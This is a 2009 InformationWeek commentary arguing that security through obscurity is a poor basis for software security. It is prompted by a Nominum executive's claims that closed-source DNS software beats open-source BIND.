Secrecy Is A Stupid Way To Sell Software Security - InformationWeek

InformationWeek is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

IoT
IoT
Government // Mobile & Wireless
Commentary
9/24/2009
03:48 PM
50%
50%

Secrecy Is A Stupid Way To Sell Software Security

It makes my day when someone out to "expose" the flaws in open-source software ends up doing exactly the opposite.

It makes my day when someone out to "expose" the flaws in open-source software ends up doing exactly the opposite.In a recent ZDnet interview, an executive with a company called Nominum tried to make a case for using his company's hosted DNS solution. Nominum's technology, which is intended to replace the ubiquitous, open-source Berkely Internet Name Domain (BIND) software, isn't of interest to most bMIghty readers.

Nominum executive Jon Shalowitz's attempt to explain what's "wrong" with BIND, however, is absolutely priceless.

I'll skip over Shalowitz's muddled claim that "open source" equals "freeware" -- a whopper that he follows with a disingenuous attempt to associate "freeware" with "malware." The real fun starts later in the interview, when he explains why Nominum is so much more secure than BIND or other open-source applications: Number one is in terms of security controls. If I have a secret way of blocking a hacker from attacking my software, if it's freeware or open source, the hacker can look at the code.

By virtue of something being open source, it has to be open to everybody to look into. I can't keep secrets in there. But if I have a commercial-grade software product, then all of that is closed off, and so things are not visible to the hacker.

By its very nature, something that is freeware or open source [is open]. There are vendors that take a freeware product and make a slight variant of it, but they are never going to be ever able to change every component to lock it down.

Nominum software was written 100 percent from the ground up, and by having software with source code that is not open for everybody to look at, it is inherently more secure. A quick trip to Netcraft reveals that Nominum's IT staff apparently didn't get the memo about avoiding software that "everybody" can "look into": The company runs an Apache Web server on Red Hat Linux. And a subsequent claim that "Nominum has never had a single known vulnerability in its software" is simply a lie: As one of Nominum's own security advisories points out, the company's products were affected last year by a serious DNS cache-poisoning exploit.

But the ultimate take-away lesson from this propaganda exercise is Shalowitz's claim that security through obscurity is a more effective way to build software.

It isn't. Shalowitz himself explains why at the end of the interview: You really do need to look under the hood and kick the tyres. Maybe it's a Ferrari on the outside, but it could be an Austin Maxi on the inside. The software being run and the network itself are very critical. And that's one point the customer really needs to be wary of.

Thanks, Jon, I couldn't have said it better myself.

Decades of security exploits, hacker attacks and malware variants prove that trying to secure software by keeping the source code a secret is a fool's game. The only party that gains a "security" advantage from closed source code is the vendor providing the software; it has the luxury of deciding if and when to disclose the vulnerability and issue a fix.

Sometimes, there are legitimate technical or business reasons to choose a closed-source, proprietary application. And in some cases, there might even be a reason to use one of Nominum's closed-source products. But when a software vendor tells you that its product is more secure because its closed source code is a "secret," it's time to find the exit. How can you trust a company like this to tell you the truth about its products when it can't seem to tell you the truth about anything else?

We welcome your comments on this topic on our social media channels, or [contact us directly] with questions about the site.
Comment  | 
Print  | 
More Insights
News
Can Cloud Revolutionize Business and Software Architecture?
Joao-Pierre S. Ruth, Senior Writer,  1/15/2021
Slideshows
10 IT Trends to Watch for in 2021
Cynthia Harvey, Freelance Journalist, InformationWeek,  12/22/2020
News
How CDOs Can Build Insight-Driven Organizations
Jessica Davis, Senior Editor, Enterprise Apps,  1/15/2021
White Papers
Register for InformationWeek Newsletters
Video
Current Issue
2021 Top Enterprise IT Trends
We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you.
Slideshows
Flash Poll